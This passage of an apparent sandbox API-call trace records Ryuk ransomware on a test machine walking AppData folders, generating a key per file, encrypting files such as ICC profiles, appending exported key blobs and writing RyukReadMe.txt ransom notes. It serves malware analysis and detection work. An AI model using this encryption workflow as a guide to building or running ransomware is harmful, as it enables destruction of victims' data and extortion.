dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.064] GetLastError () returned 0xb7 [0141.064] CloseHandle (hObject=0x194) returned 1 [0141.065] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.065] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.065] SetLastError (dwErrCode=0x0) [0141.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.065] GetLastError () returned 0xb7 [0141.065] CloseHandle (hObject=0x190) returned 1 [0141.065] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.065] SetLastError (dwErrCode=0x0) [0141.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.065] GetLastError () returned 0xb7 [0141.065] CloseHandle (hObject=0x190) returned 1 [0141.065] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.065] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.065] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.065] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.065] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst", dwFileAttributes=0x80) returned 1 [0141.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\ACECache11.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\acecache11.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.066] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=1180) returned 1 [0141.066] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=1180) returned 1 [0141.066] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x37a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.066] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.067] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.067] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.067] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.067] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.067] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x49c, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x49c, lpOverlapped=0x0) returned 1 [0141.067] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.067] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x49c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x4a0) returned 1 [0141.067] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.068] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x4a0, lpOverlapped=0x0) returned 1 [0141.068] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.068] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.068] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.068] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.068] CloseHandle (hObject=0x194) returned 1 [0141.094] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.098] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.098] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.098] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.098] SetLastError (dwErrCode=0x0) [0141.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.099] GetLastError () returned 0x0 [0141.099] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.100] CloseHandle (hObject=0x194) returned 1 [0141.100] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.101] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.101] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.101] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.101] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc", dwFileAttributes=0x80) returned 1 [0141.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.102] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=66208) returned 1 [0141.102] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=66208) returned 1 [0141.102] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1017e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.102] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.103] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.103] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.103] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.103] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.103] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x102a0, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x102a0, lpOverlapped=0x0) returned 1 [0141.107] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.107] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x102a0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x102b0) returned 1 [0141.107] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.107] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x102b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x102b0, lpOverlapped=0x0) returned 1 [0141.108] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.108] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.108] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.108] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.108] CloseHandle (hObject=0x198) returned 1 [0141.124] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.128] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.128] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.128] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.128] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.129] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc", dwFileAttributes=0x80) returned 1 [0141.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.129] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=2676) returned 1 [0141.129] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=2676) returned 1 [0141.129] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x952, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.129] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0141.131] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.131] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0141.131] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.131] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.131] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa74, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xa74, lpOverlapped=0x0) returned 1 [0141.131] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0141.131] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xa74, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xa80) returned 1 [0141.131] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.131] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xa80, lpOverlapped=0x0) returned 1 [0141.132] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0141.132] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.132] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0141.132] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0141.132] CloseHandle (hObject=0x198) returned 1 [0141.161] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.166] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.166] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.166] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.166] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.166] SetLastError (dwErrCode=0x0) [0141.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\profiles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.166] GetLastError () returned 0x0 [0141.166] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.167] CloseHandle (hObject=0x194) returned 1 [0141.167] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.167] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.168] SetLastError (dwErrCode=0x0) [0141.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\color\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.168] GetLastError () returned 0xb7 [0141.168] CloseHandle (hObject=0x190) returned 1 [0141.168] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0141.168] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0141.168] SetLastError (dwErrCode=0x0) [0141.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.168] GetLastError () returned 0xb7 [0141.168] CloseHandle (hObject=0x18c) returned 1 [0141.168] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.168] SetLastError (dwErrCode=0x0) [0141.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.168] GetLastError () returned 0xb7 [0141.168] CloseHandle (hObject=0x18c) returned 1 [0141.168] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0141.168] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0141.168] SetLastError (dwErrCode=0x0) [0141.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.169] GetLastError () returned 0xb7 [0141.169] CloseHandle (hObject=0x18c) returned 1 [0141.169] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0141.169] SetLastError (dwErrCode=0x0) [0141.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0141.169] GetLastError () returned 0xb7 [0141.169] CloseHandle (hObject=0x18c) returned 1 [0141.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0141.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.169] SetLastError (dwErrCode=0x0) [0141.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.190] GetLastError () returned 0x0 [0141.190] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.191] CloseHandle (hObject=0x190) returned 1 [0141.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.191] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.191] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.191] SetLastError (dwErrCode=0x0) [0141.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.191] GetLastError () returned 0x0 [0141.191] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.192] CloseHandle (hObject=0x194) returned 1 [0141.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.196] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.196] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.196] SetLastError (dwErrCode=0x0) [0141.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.197] GetLastError () returned 0x0 [0141.197] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0141.198] CloseHandle (hObject=0x198) returned 1 [0141.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0141.198] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.198] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0141.198] SetLastError (dwErrCode=0x0) [0141.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0141.199] GetLastError () returned 0x0 [0141.199] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0141.199] CloseHandle (hObject=0x19c) returned 1 [0141.200] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*.*", lpFindFileData=0x29aa420 | out: 